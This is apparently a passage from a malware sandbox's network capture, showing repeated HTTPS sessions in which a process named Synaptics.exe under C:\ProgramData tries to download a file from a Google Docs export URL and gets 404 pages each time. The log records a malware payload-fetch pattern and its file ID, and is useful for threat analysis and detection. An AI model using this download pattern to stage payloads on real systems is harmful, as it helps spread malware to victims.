                                                                                                                                                                                        2022-05-17 11:31:59 UTC682INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:59 UTC683INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        226192.168.2.350003142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC680OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC683INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rA4C8Xfn1G91gnQPnVHYGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC684INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 55 54 54 78 48 4f 70 58 4e 4d 34 5a 54 74 30 4e 6a 6d 62 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sUTTxHOpXNM4ZTt0NjmbKw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:59 UTC686INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:59 UTC686INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        227192.168.2.350004142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC683OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC686INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wgSHIj9FRefRs8PRUbuPVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC687INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:59 UTC687INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 6c 46 50 42 69 2b 63 2f 32 73 32 72 75 67 62 7a 62 4a 54 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="blFPBi+c/2s2rugbzbJTHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:59 UTC689INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:59 UTC689INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        228192.168.2.350005142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC686OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:59 UTC689INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nkt0N4R1+rdW9JGz0a55kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:59 UTC690INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:59 UTC690INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 78 6f 4c 52 64 2b 58 4e 73 71 6f 43 62 33 48 4f 30 64 4c 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TxoLRd+XNsqoCb3HO0dLFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:59 UTC692INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:59 UTC692INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        229192.168.2.350006142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:59 UTC689OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:00 UTC692INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:59 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JDpsg4DOJdk7wtQcviN+CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:00 UTC694INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 78 31 55 72 68 71 71 35 70 69 6a 52 35 6a 38 46 4c 55 77 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nx1Urhqq5pijR5j8FLUwXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:00 UTC695INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:00 UTC695INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        23192.168.2.349761142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC69OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:32 UTC72INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:32 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-QhPsW0OLoT0Be3R24rQQpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:32 UTC73INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:32 UTC73INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 6e 39 36 46 72 76 56 36 48 71 79 7a 55 70 59 66 72 36 6f 49 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="on96FrvV6HqyzUpYfr6oIQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
